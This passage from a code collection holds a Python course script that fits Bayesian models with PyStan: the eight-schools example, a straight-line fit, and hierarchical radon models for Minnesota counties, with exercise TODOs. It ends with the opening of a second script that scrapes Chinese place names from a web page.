of effect estimates\n}\nparameters { //this block defines the parameters we want to trace\n real mu;\n real tau;\n vector[J] eta;\n}\ntransformed parameters { //this block is used for parameters that are defined through other parameters or data\n vector[J] theta;\n theta = mu + tau * eta;\n}\nmodel { //this is where we set up the distributions\n eta ~ normal(0, 1);\n y ~ normal(theta, sigma);\n}\n\"\"\"\n\nschools_dat = {'J': 8,\n 'y': [28, 8, -3, 7, -1, 1, 18, 12],\n 'sigma': [15, 10, 16, 11, 9, 11, 10, 18]}\n\nsm = pystan.StanModel(model_code=schools_code)\nfit = sm.sampling(data=schools_dat, iter=1000, chains=4, seed = 1954989094)\n\nfit\nfit.plot()\nfit.extract()\nfit.extract('theta')\n\n#from a file\nsm = pystan.StanModel(file = 'KocPython2020/in-classMaterial/day11/8schools.stan')\n\n#useful additional arguments: n_jobs and control\nfit2 = sm.sampling(data=schools_dat, iter=1000, chains=4, seed = 1954989094, n_jobs=1, control = {'adapt_delta':.9, 'stepsize':20, 'max_treedepth':20})\n\n#control has the following possible parameters (the above three are the most important)\n\n# adapt_engaged : bool\n# adapt_gamma : float, positive, default 0.05\n# adapt_delta : float, between 0 and 1, default 0.8\n# adapt_kappa : float, between default 0.75\n# adapt_t0 : float, positive, default 10\n# adapt_init_buffer : int, positive, defaults to 75\n# adapt_term_buffer : int, positive, defaults to 50\n# adapt_window : int, positive, defaults to 25\n# stepsize: float, positive\n# stepsize_jitter: float, between 0 and 1\n# metric : str, {“unit_e”, “diag_e”, “dense_e”}\n# max_treedepth : int, positive\n\n\n\"\"\"\nExample of running emcee to fit the parameters of a straight line.\n\"\"\"\n\nfrom __future__ import print_function, division\n\nimport os\nimport sys\nimport numpy as np\n\nimport matplotlib as mpl\n\n# import PyStan\nimport pystan\n\nos.chdir('KocPython2020/in-classMaterial/day11')\n\n# import model and data\nfrom createdata import *\n\n# Create model code\nline_code = \"\"\"\ndata {{\n int N; // number of data points\n real y[N]; // observed data points\n real x[N]; // abscissa points\n real sigma; // standard deviation\n}}\nparameters {{\n // parameters for the fit\n real m;\n real c;\n}}\ntransformed parameters {{\n real theta[N];\n for (j in 1:N)\n theta[j] = m * x[j] + c; // straight line model\n}}\nmodel {{\n m ~ normal({mmu}, {msigma}); // prior on m (gradient)\n c ~ uniform({clower}, {cupper}); // prior on c (y-intercept)\n y ~ normal(theta, sigma); // likelihood of the data given the model\n}}\n\"\"\"\n\n# set the data and the abscissa\nlinear_data = {'N': M, # number of data points\n 'y': data, # observed data (converted from numpy array to a list)\n 'x': x, # abscissa points (converted from numpy array to a list)\n 'sigma': sigma} # standard deviation\n\nNsamples = 1000 # set the number of iterations of the sampler\nchains = 4 # set the number of chains to run with\n\n# dictionary for inputs into line_code (this type of setting up priors is unnecessary, but thought you should know it exists)\nlinedict = {}\nlinedict['mmu'] = 0.0 # mean of Gaussian prior distribution for m\nlinedict['msigma'] = 10 # standard deviation of Gaussian prior distribution for m\nlinedict['clower'] = -10 # lower bound on uniform prior distribution for c\nlinedict['cupper'] = 10 # upper bound on uniform prior distribution for c\n\nsm = pystan.StanModel(model_code=line_code.format(**linedict)); # compile model\nfit3 = sm.sampling(data=linear_data, iter=Nsamples, chains=chains); # perform sampling\n\nla = 
fit3.extract(permuted=True) # return a dictionary of arrays\n\n# extract the samples\npostsamples = np.vstack((la['m'], la['c'])).T\n\n# plot posterior samples (if corner.py is installed)\ntry:\n import corner # import corner.py\nexcept ImportError:\n sys.exit(1)\n\nprint('Number of posterior samples is {}'.format(postsamples.shape[0]))\n\nfig = corner.corner(postsamples, labels=[r\"$m$\", r\"$c$\"], truths=[m, c])\n\n\n#TODO: Write a logit model that takes one continuous explanatory variable for a binary outcome. Then run it on the voting turnout data in turnout.csv (the outcome is whether or not they voted, vote, and the explanatory variable is income)\n\n\n#TODO: Change the model to be a probit model and compare the results to the logit. Why would the estimates be different?\n\n\n#TODO: Generalize the logit model to take K predictors. Include age, educate, and income as predictors.\n\n\n\n\n#hierarchical modeling\n\n#Hierarchical or multilevel modeling is a generalization of regression modeling.\n\n#Multilevel models are regression models in which the constituent model parameters are given probability models. This implies that model parameters are allowed to vary by group.\n\n#Observational units are often naturally clustered. Clustering induces dependence between observations, despite random sampling of clusters and random sampling within clusters.\n\n#A hierarchical model is a particular multilevel model where parameters are nested within one another.\n\n#Some multilevel structures are not hierarchical.\n\n# e.g. \"country\" and \"year\" are not nested, but may represent separate, but overlapping, clusters of parameters\n\n#We will motivate this topic using an environmental epidemiology example.\n\n#Example: Radon contamination (Gelman and Hill 2006)\n\n#Radon is a radioactive gas that enters homes through contact points with the ground. It is a carcinogen that is the primary cause of lung cancer in non-smokers. Radon levels vary greatly from household to household.\n\n#radon\n\n#The EPA did a study of radon levels in 80,000 houses. 
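\n\n# A possible starting point for the logit/probit TODOs above -- a sketch, not a\n# full solution. The column names vote and income come from the TODO text; the\n# priors and everything else here are assumptions.\nlogit_code = \"\"\"\ndata {\n int<lower=0> N;\n int<lower=0,upper=1> vote[N];\n vector[N] income;\n}\nparameters {\n real alpha;\n real beta;\n}\nmodel {\n alpha ~ normal(0, 10);\n beta ~ normal(0, 10);\n vote ~ bernoulli_logit(alpha + beta * income);\n}\n\"\"\"\n# turnout = pd.read_csv('turnout.csv') # assumes the csv sits in the working directory\n# logit_fit = pystan.StanModel(model_code=logit_code).sampling(\n# data={'N': len(turnout), 'vote': turnout.vote.astype(int).values,\n# 'income': turnout.income.values}, iter=1000, chains=4)\n# For the probit TODO, swap the last sampling statement for\n# vote ~ bernoulli(Phi(alpha + beta * income));\n# the estimates differ because the logistic link has heavier tails than the\n# normal CDF, so logit coefficients run roughly 1.6-1.8 times the probit ones.\n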
#Two important predictors:\n\n# measurement in basement or first floor (radon higher in basements)\n# county uranium level (positive correlation with radon levels)\n\n#We will focus on modeling radon levels in Minnesota.\n\n#The hierarchy in this example is households within county.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Import radon data\nsrrs2 = pd.read_csv('srrs2.dat')\nsrrs2.columns = srrs2.columns.map(str.strip)\nsrrs_mn = srrs2.assign(fips=srrs2.stfips*1000 + srrs2.cntyfips)[srrs2.state=='MN']\n# Next, obtain the county-level predictor, uranium, by combining two variables.\ncty = pd.read_csv('cty.dat')\ncty_mn = cty[cty.st=='MN'].copy()\ncty_mn['fips'] = 1000*cty_mn.stfips + cty_mn.ctfips\n# Use the merge method to combine home- and county-level information in a single DataFrame.\nsrrs_mn = srrs_mn.merge(cty_mn[['fips', 'Uppm']], on='fips')\nsrrs_mn = srrs_mn.drop_duplicates(subset='idnum')\nu = np.log(srrs_mn.Uppm)\nn = len(srrs_mn)\n\nsrrs_mn.head()\n\n# We also need a lookup table (dict) for each unique county, for indexing.\nsrrs_mn.county = srrs_mn.county.str.strip()\nmn_counties = srrs_mn.county.unique()\ncounties = len(mn_counties)\n\n# Finally, create local copies of variables.\ncounty_lookup = dict(zip(mn_counties, range(len(mn_counties))))\ncounty = srrs_mn['county_code'] = srrs_mn.county.replace(county_lookup).values\nradon = srrs_mn.activity\nsrrs_mn['log_radon'] = log_radon = np.log(radon + 0.1).values\nfloor_measure = srrs_mn.floor.values\n# Distribution of radon levels in MN (log scale):\nsrrs_mn.activity.apply(lambda x: np.log(x+0.1)).hist(bins=25)\n\n#Conventional approaches\n\n#The two conventional alternatives to modeling radon exposure represent the two extremes of the bias-variance tradeoff:\n\n#Complete pooling:\n\n#Treat all counties the same, and estimate a single radon level.\n#y_i = α + β x_i + ϵ_i\n\n#No pooling:\n\n#Model radon in each county independently.\n#y_i = α_j[i] + β x_i + ϵ_i\n\n#where j = 1,…,85 indexes the county\n\n#The errors ϵ_i may represent measurement error, temporal within-house variation, or variation among houses.\n\n#To specify this model in Stan, we begin by constructing the data block, which includes vectors of log-radon measurements (y) and floor measurement covariates (x), as well as the number of samples (N).\n\npooled_data = \"\"\"\ndata {\n int<lower=0> N;\n vector[N] x;\n vector[N] y;\n}\n\"\"\"\n\n#Next we initialize our parameters, which in this case are the linear model coefficients and the normal scale parameter. Notice that sigma is constrained to be positive.\n\npooled_parameters = \"\"\"\nparameters {\n vector[2] beta;\n real<lower=0> sigma;\n} \n\"\"\"\n\n#Finally, we model the log-radon measurements as a normal sample with a mean that is a function of the floor measurement.\n\npooled_model = \"\"\"\nmodel {\n y ~ normal(beta[1] + beta[2] * x, sigma);\n}\n\"\"\"\n\n#We then pass the code, data, and parameters to the stan function. The sampling requires specifying how many iterations we want, and how many parallel chains to sample.
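\n\n# Compiling a Stan program takes a while; an optional pattern (a sketch, not part\n# of the original tutorial) is to cache the compiled StanModel with pickle and\n# reuse it across runs. The cache filename is arbitrary.\nimport pickle\ndef cached_model(model_code, path='cached_stan_model.pkl'):\n try:\n with open(path, 'rb') as f:\n return pickle.load(f) # reuse a previously compiled model\n except (IOError, OSError):\n sm_ = pystan.StanModel(model_code=model_code) # compile once\n with open(path, 'wb') as f:\n pickle.dump(sm_, f)\n return sm_\n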
#Here, we will sample 2 chains of length 1000.\n\npooled_data_dict = {'N': len(log_radon),\n 'x': floor_measure,\n 'y': log_radon}\n# Notice we did not compile the model separately first --- pystan.stan compiles and samples in a single call; either approach is fine.\npooled_fit = pystan.stan(model_code=pooled_data + pooled_parameters + pooled_model, data=pooled_data_dict, iter=1000, chains=2)\n \n#The sample can be extracted for plotting and summarization.\n\npooled_sample = pooled_fit.extract(permuted=True)\n\nb0, m0 = pooled_sample['beta'].T.mean(1)\n\nplt.scatter(srrs_mn.floor, np.log(srrs_mn.activity+0.1))\nxvals = np.linspace(-0.2, 1.2)\nplt.plot(xvals, m0*xvals+b0, 'r--')\n\n#At the other extreme, we can fit separate (independent) means for each county. The only things that are shared in this model are the coefficient for the basement measurement effect, and the standard deviation of the error.\n\nunpooled_model = \"\"\"data {\n int<lower=0> N;\n int county[N];\n vector[N] x;\n vector[N] y;\n} \nparameters {\n vector[85] a;\n real beta;\n real<lower=0> sigma;\n} \ntransformed parameters {\n vector[N] y_hat;\n\n for (i in 1:N)\n y_hat[i] = beta * x[i] + a[county[i]];\n}\nmodel {\n y ~ normal(y_hat, sigma);\n}\"\"\"\n\nunpooled_data = {'N': len(log_radon),\n 'county': county+1, # Stan counts starting at 1\n 'x': floor_measure,\n 'y': log_radon}\n\nunpooled_fit = pystan.stan(model_code=unpooled_model, data=unpooled_data, iter=1000, chains=2)\n\nunpooled_estimates = pd.Series(unpooled_fit['a'].mean(0), index=mn_counties)\nunpooled_se = pd.Series(unpooled_fit['a'].std(0), index=mn_counties)\n\n#We can plot the ordered estimates to identify counties with high radon levels:\n\norder = unpooled_estimates.sort_values().index\n\nplt.scatter(range(len(unpooled_estimates)), unpooled_estimates[order])\nfor i, m, se in zip(range(len(unpooled_estimates)), unpooled_estimates[order], unpooled_se[order]):\n plt.plot([i,i], [m-se, m+se], 'b-')\nplt.xlim(-1,86); plt.ylim(-1,4)\nplt.ylabel('Radon estimate');plt.xlabel('Ordered county');\n\n#Here are visual comparisons between the pooled and unpooled estimates for a subset of counties representing a range of sample sizes.\n\nsample_counties = ('LAC QUI PARLE', 'AITKIN', 'KOOCHICHING', \n 'DOUGLAS', 'CLAY', 'STEARNS', 'RAMSEY', 'ST LOUIS')\n\nfig, axes = plt.subplots(2, 4, figsize=(12, 6), sharey=True, sharex=True)\naxes = axes.ravel()\nm = unpooled_fit['beta'].mean(0)\nfor i,c in enumerate(sample_counties):\n y = srrs_mn.log_radon[srrs_mn.county==c]\n x = srrs_mn.floor[srrs_mn.county==c]\n axes[i].scatter(x + np.random.randn(len(x))*0.01, y, alpha=0.4)\n \n # No pooling model\n b = unpooled_estimates[c]\n \n # Plot both models and data\n xvals = np.linspace(-0.2, 1.2)\n axes[i].plot(xvals, m*xvals+b)\n axes[i].plot(xvals, m0*xvals+b0, 'r--')\n axes[i].set_xticks([0,1])\n axes[i].set_xticklabels(['basement', 'floor'])\n axes[i].set_ylim(-1, 3)\n axes[i].set_title(c)\n if not i%2:\n axes[i].set_ylabel('log radon level')\n \n#Neither of these models is satisfactory:\n# if we are trying to identify high-radon counties, pooling is useless\n# we do not trust extreme unpooled estimates produced by models using few observations\n\n#Multilevel and hierarchical models\n\n#When we pool our data, we imply that they are sampled from the same model. This ignores any variation among sampling units (other than sampling variance).\n\n#When we analyze data unpooled, we imply that they are sampled independently from separate models.
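\n\n# A quick numeric check of the claim above that the extreme unpooled estimates\n# come from counties with few observations (a sketch reusing objects defined\n# earlier in this script):\nobs_per_county = srrs_mn.groupby('county')['idnum'].count()\ndeviation = (unpooled_estimates - log_radon.mean()).abs()\nprint(pd.concat({'n_obs': obs_per_county, 'deviation': deviation}, axis=1)\n .sort_values('deviation', ascending=False).head(10))\n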
#At the opposite extreme from the pooled case, this approach claims that differences between sampling units are too large to combine them.\n\n#In a hierarchical model, parameters are viewed as a sample from a population distribution of parameters. Thus, we view them as being neither entirely different nor exactly the same. This is partial pooling.\n\n#We can use PyStan to easily specify multilevel models, and fit them using Hamiltonian Monte Carlo.\n\n# Estimates for counties with smaller sample sizes will shrink towards the state-wide average.\n# Estimates for counties with larger sample sizes will be closer to the unpooled county estimates.\n\npartial_pooling = \"\"\"\ndata {\n int<lower=0> N;\n int county[N];\n vector[N] y;\n} \nparameters {\n vector[85] a;\n real mu_a;\n real<lower=0> sigma_a;\n real<lower=0> sigma_y;\n} \ntransformed parameters {\n vector[N] y_hat;\n for (i in 1:N)\n y_hat[i] = a[county[i]];\n}\nmodel {\n mu_a ~ normal(0, 1);\n a ~ normal (10 * mu_a, sigma_a);\n\n y ~ normal(y_hat, sigma_y);\n}\"\"\"\n\n#Notice now we have two standard deviations, one describing the residual error of the observations, and another the variability of the county means around the average.\n\npartial_pool_data = {'N': len(log_radon),\n 'county': county+1, # Stan counts starting at 1\n 'y': log_radon}\n\npartial_pool_fit = pystan.stan(model_code=partial_pooling, data=partial_pool_data, iter=1000, chains=2)\n\nsample_trace = partial_pool_fit['a']\n\nfig, axes = plt.subplots(1, 2, figsize=(14,6), sharex=True, sharey=True)\nsamples, counties = sample_trace.shape\njitter = np.random.normal(scale=0.1, size=counties)\n\nn_county = srrs_mn.groupby('county')['idnum'].count()\nunpooled_means = srrs_mn.groupby('county')['log_radon'].mean()\nunpooled_sd = srrs_mn.groupby('county')['log_radon'].std()\nunpooled = pd.DataFrame({'n':n_county, 'm':unpooled_means, 'sd':unpooled_sd})\nunpooled['se'] = unpooled.sd/np.sqrt(unpooled.n)\n\naxes[0].plot(unpooled.n + jitter, unpooled.m, 'b.')\nfor j, row in zip(jitter, unpooled.iterrows()):\n name, dat = row\n axes[0].plot([dat.n+j,dat.n+j], [dat.m-dat.se, dat.m+dat.se], 'b-')\naxes[0].set_xscale('log')\naxes[0].hlines(sample_trace.mean(), 0.9, 100, linestyles='--')\n\nsamples, counties = sample_trace.shape\nmeans = sample_trace.mean(axis=0)\nsd = sample_trace.std(axis=0)\naxes[1].scatter(n_county.values + jitter, means)\naxes[1].set_xscale('log')\naxes[1].set_xlim(1,100)\naxes[1].set_ylim(0, 3)\naxes[1].hlines(sample_trace.mean(), 0.9, 100, linestyles='--')\nfor j,n,m,s in zip(jitter, n_county.values, means, sd):\n axes[1].plot([n+j]*2, [m-s, m+s], 'b-')\n\n#Notice the difference between the unpooled and partially-pooled estimates, particularly at smaller sample sizes.
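\n\n# Shrinkage in numbers (a sketch reusing objects defined above): the gap between\n# each county's raw mean and its partially pooled estimate should be largest for\n# the counties with the fewest houses. The reindexing via county_lookup guards\n# against the alphabetical groupby order differing from Stan's county coding.\norder_idx = [county_lookup[name] for name in n_county.index]\npartial_means = sample_trace.mean(axis=0)[order_idx]\nshrinkage = pd.DataFrame({'n': n_county.values,\n 'pull': np.abs(unpooled_means.values - partial_means)},\n index=n_county.index)\nprint(shrinkage.sort_values('n').head(10)) # the smallest counties move the most\n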
#The unpooled estimates are both more extreme and more imprecise.\n\n#Varying intercept model\n\n#This model allows intercepts to vary across county, according to a random effect.\n#y_i = α_j[i] + β x_i + ϵ_i\n\n#where\n#ϵ_i ~ N(0, σ_y^2)\n\n#and the intercept random effect:\n#α_j[i] ~ N(μ_α, σ_α^2)\n\n#As with the “no-pooling” model, we set a separate intercept for each county, but rather than fitting separate least squares regression models for each county, multilevel modeling shares strength among counties, allowing for more reasonable inference in counties with little data.\n\nvarying_intercept = \"\"\"\ndata {\n int<lower=0> J;\n int<lower=0> N;\n int county[N];\n vector[N] x;\n vector[N] y;\n} \nparameters {\n vector[J] a;\n real b;\n real mu_a;\n real<lower=0,upper=100> sigma_a;\n real<lower=0,upper=100> sigma_y;\n} \ntransformed parameters {\n\n vector[N] y_hat;\n\n for (i in 1:N)\n y_hat[i] = a[county[i]] + x[i] * b;\n}\nmodel {\n sigma_a ~ uniform(0, 100);\n a ~ normal (mu_a, sigma_a);\n\n b ~ normal (0, 1);\n\n sigma_y ~ uniform(0, 100);\n y ~ normal(y_hat, sigma_y);\n}\n\"\"\"\n\nvarying_intercept_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'x': floor_measure,\n 'y': log_radon}\n\nvarying_intercept_fit = pystan.stan(model_code=varying_intercept, data=varying_intercept_data, iter=1000, chains=2)\n\na_sample = pd.DataFrame(varying_intercept_fit['a'])\n\nimport seaborn as sns\nsns.set(style=\"ticks\", palette=\"muted\", color_codes=True)\n\n# Boxplots of the per-county intercept samples\nplt.figure(figsize=(16, 6))\nsns.boxplot(data=a_sample, whis=np.inf, color=\"c\")\n\nvarying_intercept_fit.plot(pars=['sigma_a', 'b']);\n\nvarying_intercept_fit['b'].mean()\n\nxvals = np.arange(2)\nbp = varying_intercept_fit['a'].mean(axis=0)\nmp = varying_intercept_fit['b'].mean()\nfor bi in bp:\n plt.plot(xvals, mp*xvals + bi, 'bo-', alpha=0.4)\nplt.xlim(-0.1,1.1);\n\n#It is easy to show that the partial pooling model provides more objectively reasonable estimates than either the pooled or unpooled models, at least for counties with small sample sizes.\n\nfig, axes = plt.subplots(2, 4, figsize=(12, 6), sharey=True, sharex=True)\naxes = axes.ravel()\nfor i,c in enumerate(sample_counties):\n \n # Plot county data\n y = srrs_mn.log_radon[srrs_mn.county==c]\n x = srrs_mn.floor[srrs_mn.county==c]\n axes[i].scatter(x + np.random.randn(len(x))*0.01, y, alpha=0.4)\n \n # No pooling model: common slope, county-specific intercept\n m = unpooled_fit['beta'].mean(0)\n b = unpooled_estimates[c]\n \n xvals = np.linspace(-0.2, 1.2)\n # Unpooled estimate\n axes[i].plot(xvals, m*xvals+b)\n # Pooled estimate\n axes[i].plot(xvals, m0*xvals+b0, 'r--')\n # Partial pooling estimate\n axes[i].plot(xvals, mp*xvals+bp[county_lookup[c]], 'k:')\n axes[i].set_xticks([0,1])\n axes[i].set_xticklabels(['basement', 'floor'])\n axes[i].set_ylim(-1, 3)\n axes[i].set_title(c)\n if not i%2:\n axes[i].set_ylabel('log radon level')\n\n\n#Varying slope model\n\n#Alternatively, we can posit a model that allows the counties to vary according to how the location of measurement (basement or floor) influences the radon reading.\n#y_i = α + β_j[i] x_i + ϵ_i\n\nvarying_slope = \"\"\"\ndata {\n int<lower=0> J;\n int<lower=0> N;\n int county[N];\n vector[N] x;\n vector[N] y;\n} \nparameters {\n real a;\n vector[J] b;\n real mu_b;\n real<lower=0,upper=100> sigma_b;\n real<lower=0,upper=100> sigma_y;\n} \ntransformed parameters {\n\n vector[N] y_hat;\n\n for (i in 1:N)\n y_hat[i] = a + x[i] * b[county[i]];\n}\nmodel {\n sigma_b ~ uniform(0, 100);\n b ~ normal (mu_b, sigma_b);\n\n a ~ normal (0, 1);\n\n sigma_y ~ uniform(0, 100);\n y ~ normal(y_hat, sigma_y);\n}\n\"\"\"\n\nvarying_slope_data = 
{'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'x': floor_measure,\n 'y': log_radon}\n\nvarying_slope_fit = pystan.stan(model_code=varying_slope, data=varying_slope_data, iter=1000, chains=2)\n\nb_sample = pd.DataFrame(varying_slope_fit['b'])\n\n# Boxplots of the per-county slope samples\nplt.figure(figsize=(16, 6))\nsns.boxplot(data=b_sample, whis=np.inf, color=\"c\")\n\nxvals = np.arange(2)\nb = varying_slope_fit['a'].mean()\nm = varying_slope_fit['b'].mean(axis=0)\nfor mi in m:\n plt.plot(xvals, mi*xvals + b, 'bo-', alpha=0.4)\nplt.xlim(-0.2, 1.2);\n\n#Varying intercept and slope model\n\n#The most general model allows both the intercept and slope to vary by county:\n#y_i = α_j[i] + β_j[i] x_i + ϵ_i\n\nvarying_intercept_slope = \"\"\"\ndata {\n int<lower=0> N;\n int<lower=0> J;\n vector[N] y;\n vector[N] x;\n int county[N];\n}\nparameters {\n real<lower=0> sigma;\n real<lower=0> sigma_a;\n real<lower=0> sigma_b;\n vector[J] a;\n vector[J] b;\n real mu_a;\n real mu_b;\n}\n\nmodel {\n mu_a ~ normal(0, 100);\n mu_b ~ normal(0, 100);\n\n a ~ normal(mu_a, sigma_a);\n b ~ normal(mu_b, sigma_b);\n y ~ normal(a[county] + b[county].*x, sigma);\n}\n\"\"\"\n\nvarying_intercept_slope_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'x': floor_measure,\n 'y': log_radon}\n\nvarying_intercept_slope_fit = pystan.stan(model_code=varying_intercept_slope, \n data=varying_intercept_slope_data, \n iter=1000, chains=2)\n\nxvals = np.arange(2)\nb = varying_intercept_slope_fit['a'].mean(axis=0)\nm = varying_intercept_slope_fit['b'].mean(axis=0)\nfor bi,mi in zip(b,m):\n plt.plot(xvals, mi*xvals + bi, 'bo-', alpha=0.4)\nplt.xlim(-0.1, 1.1);\n\n#Adding group-level predictors\n\n#A primary strength of multilevel models is the ability to handle predictors on multiple levels simultaneously. If we consider the varying-intercepts model above:\n#y_i = α_j[i] + β x_i + ϵ_i\n\n#we may, instead of a simple random effect to describe variation in the expected radon value, specify another regression model with a county-level covariate. Here, we use the county uranium reading u_j, which is thought to be related to radon levels:\n#α_j = γ_0 + γ_1 u_j + ζ_j\n#ζ_j ~ N(0, σ_α^2)\n\n#Thus, we are now incorporating a house-level predictor (floor or basement) as well as a county-level predictor (uranium).\n\n#Note that the model has both indicator variables for each county, plus a county-level covariate. In classical regression, this would result in collinearity. In a multilevel model, the partial pooling of the intercepts towards the expected value of the group-level linear model avoids this.\n\n#Group-level predictors also serve to reduce group-level variation σ_α.\n# 
An important implication of this is that the group-level estimate induces stronger pooling.\n\nhierarchical_intercept = \"\"\"\ndata {\n int J; \n int N; \n int county[N];\n vector[N] u;\n vector[N] x;\n vector[N] y;\n} \nparameters {\n vector[J] a;\n vector[2] b;\n real mu_a;\n real sigma_a;\n real sigma_y;\n} \ntransformed parameters {\n vector[N] y_hat;\n vector[N] m;\n\n for (i in 1:N) {\n m[i] = a[county[i]] + u[i] * b[1];\n y_hat[i] = m[i] + x[i] * b[2];\n }\n}\nmodel {\n mu_a ~ normal(0, 1);\n a ~ normal(mu_a, sigma_a);\n b ~ normal(0, 1);\n y ~ normal(y_hat, sigma_y);\n}\n\"\"\"\n\nhierarchical_intercept_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'u': u,\n 'x': floor_measure,\n 'y': log_radon}\n\nhierarchical_intercept_fit = pystan.stan(model_code=hierarchical_intercept, data=hierarchical_intercept_data, \n iter=1000, chains=2)\n\n#a_means = M_hierarchical.a.trace().mean(axis=0)\nm_means = hierarchical_intercept_fit['m'].mean(axis=0)\nplt.scatter(u, m_means)\ng0 = hierarchical_intercept_fit['mu_a'].mean()\ng1 = hierarchical_intercept_fit['b'][:, 0].mean()\nxvals = np.linspace(-1, 0.8)\nplt.plot(xvals, g0+g1*xvals, 'k--')\nplt.xlim(-1, 0.8)\n\nm_se = hierarchical_intercept_fit['m'].std(axis=0)\nfor ui, m, se in zip(u, m_means, m_se):\n plt.plot([ui,ui], [m-se, m+se], 'b-')\nplt.xlabel('County-level uranium'); plt.ylabel('Intercept estimate')\n\n\n\n#The standard errors on the intercepts are narrower than for the partial-pooling model without a county-level covariate.\n#Correlations among levels\n\n#In some instances, having predictors at multiple levels can reveal correlation between individual-level variables and group residuals. We can account for this by including the average of the individual predictors as a covariate in the model for the group intercept.\n#αj=γ0+γ1uj+γ2x¯+ζj\n\n#These are broadly referred to as contextual effects.\n\n# Create new variable for mean of floor across counties\nxbar = srrs_mn.groupby('county')['floor'].mean().rename(county_lookup).values\n\nx_mean = xbar[county]\n\ncontextual_effect = \"\"\"\ndata {\n int J; \n int N; \n int county[N];\n vector[N] u;\n vector[N] x;\n vector[N] x_mean;\n vector[N] y;\n} \nparameters {\n vector[J] a;\n vector[3] b;\n real mu_a;\n real sigma_a;\n real sigma_y;\n} \ntransformed parameters {\n vector[N] y_hat;\n\n for (i in 1:N)\n y_hat[i] = a[county[i]] + u[i]*b[1] + x[i]*b[2] + x_mean[i]*b[3];\n}\nmodel {\n mu_a ~ normal(0, 1);\n a ~ normal(mu_a, sigma_a);\n b ~ normal(0, 1);\n y ~ normal(y_hat, sigma_y);\n}\n\"\"\"\n\ncontextual_effect_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'u': u,\n 'x_mean': x_mean,\n 'x': floor_measure,\n 'y': log_radon}\n\ncontextual_effect_fit = pystan.stan(model_code=contextual_effect, data=contextual_effect_data, \n iter=1000, chains=2)\n\ncontextual_effect_fit['b'].mean(0)\n\ncontextual_effect_fit.plot('b');\n\n#So, we might infer from this that counties with higher proportions of houses without basements tend to have higher baseline levels of radon. 
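\n\n# To attach uncertainty to that inference (a sketch): posterior means and 95%\n# credible intervals for the three coefficients in b, in the order they enter\n# y_hat (uranium, floor, county mean floor).\nb_post = contextual_effect_fit['b']\nfor label, draws in zip(['uranium', 'floor', 'mean_floor'], b_post.T):\n low, high = np.percentile(draws, [2.5, 97.5])\n print('{}: mean={:.2f}, 95% CI=({:.2f}, {:.2f})'.format(label, draws.mean(), low, high))\n# 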
Perhaps this is related to the soil type, which in turn might influence what type of structures are built.\n\n\n#Prediction\n\n#Gelman (2006) used cross-validation tests to check the prediction error of the unpooled, pooled, and partially-pooled models\n\n#root mean squared cross-validation prediction errors:\n\n# unpooled = 0.86\n# pooled = 0.84\n# multilevel = 0.79\n\n#There are two types of prediction that can be made in a multilevel model:\n\n# a new individual within an existing group\n# a new individual within a new group\n\n#For example, if we wanted to make a prediction for a new house with no basement in St. Louis county, we just need to sample from the radon model with the appropriate intercept.\n\ncounty_lookup['ST LOUIS']\n\n#That is,\n#ỹ i∼N(α69+β(xi=1),σ2y)\n\n#This is simply a matter of adding a single additional line in PyStan:\n\ncontextual_pred = \"\"\"\ndata {\n int J; \n int N; \n int stl;\n real u_stl;\n real xbar_stl;\n int county[N];\n vector[N] u;\n vector[N] x;\n vector[N] x_mean;\n vector[N] y;\n} \nparameters {\n vector[J] a;\n vector[3] b;\n real mu_a;\n real sigma_a;\n real sigma_y;\n} \ntransformed parameters {\n vector[N] y_hat;\n real stl_mu;\n\n for (i in 1:N)\n y_hat[i] = a[county[i]] + u[i] * b[1] + x[i] * b[2] + x_mean[i] * b[3];\n \n stl_mu = a[stl+1] + u_stl * b[1] + b[2] + xbar_stl * b[3];\n }\nmodel {\n mu_a ~ normal(0, 1);\n a ~ normal(mu_a, sigma_a);\n b ~ normal(0, 1);\n y ~ normal(y_hat, sigma_y);\n}\ngenerated quantities {\n real y_stl;\n \n y_stl = normal_rng(stl_mu, sigma_y);\n}\n\"\"\"\n\ncontextual_pred_data = {'N': len(log_radon),\n 'J': len(n_county),\n 'county': county+1, # Stan counts starting at 1\n 'u': u,\n 'x_mean': x_mean,\n 'x': floor_measure,\n 'y': log_radon,\n 'stl': 69,\n 'u_stl': np.log(cty_mn[cty_mn.cty=='STLOUIS'].Uppm.values)[0],\n 'xbar_stl': xbar[69]}\n\ncontextual_pred_fit = pystan.stan(model_code=contextual_pred, data=contextual_pred_data, \n iter=1000, chains=2)\n\ncontextual_pred_fit.plot('y_stl');\n\n\n#TODO: How would we make a prediction from a new county (e.g. one not included in this dataset)?\n\n\n#Change the first set of models:\n\n#TODO: Make an indicator for the observation being of white race. Allow the intercepts of the logit to vary by race. 
Place priors on the mean and standard deviation of the random intercepts.\n\n\n#TODO: Allow the economic slopes and intercept to vary by race\n\n\n","sub_path":"in-classMaterial/day11/exampleStan.py","file_name":"exampleStan.py","file_ext":"py","file_size_in_byte":28346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"337565287","text":"import requests\r\nimport re\r\nimport pypinyin as py\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nurl='http://www.360doc.com/content/16/0419/10/877149_551849520.shtml'\r\nr = requests.get(url)\r\nr.encoding = 'utf-8'\r\n\r\ns_name = re.findall('[\\u4e00-\\u9fa5]{1,3}市', r.text)\r\ns_name = list(set(s_name))\r\nshi = []\r\nfor i in s_name:\r\n shi.append(i[:-1])\r\nshi_removed = shi.remove('中国省')\r\nshi_removed = shi.remove('国各省')\r\nshi_removed = shi.remove('县级')\r\nshi_removed = shi.remove('辖地级')\r\nshi_removed = shi.remove('县个级')\r\nshi_removed = shi.remove('全国省')\r\n\r\nx_name = re.findall('[\\u4e00-\\u9fa5]{1,3}县', r.text)\r\nx_name = list(set(x_name))\r\nxian = []\r\nfor i in x_name:\r\n\txian.append(i[:-1])\r\n\r\nq_name = re.findall('[\\u4e00-\\u9fa5]{2,3}区', r.text)\r\nq_name = list(set(q_name))\r\nqu = []\r\nfor i in 